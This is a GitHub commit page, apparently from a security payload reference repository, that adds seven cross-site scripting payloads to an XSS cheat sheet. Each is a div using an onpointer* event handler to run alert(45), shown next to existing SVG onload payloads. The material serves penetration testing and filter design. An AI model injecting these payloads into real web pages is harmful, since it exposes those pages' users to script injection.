Skip to content

Commit

Permalink
XSS onpointer*
Browse files Browse the repository at this point in the history
  • Loading branch information
swisskyrepo committed Aug 1, 2019
1 parent a331d87 commit 9b96c76
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions XSS Injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -141,6 +141,15 @@ Svg payload
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)

Div payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
```

XSS for HTML5
Expand Down

0 comments on commit 9b96c76

Please sign in to comment.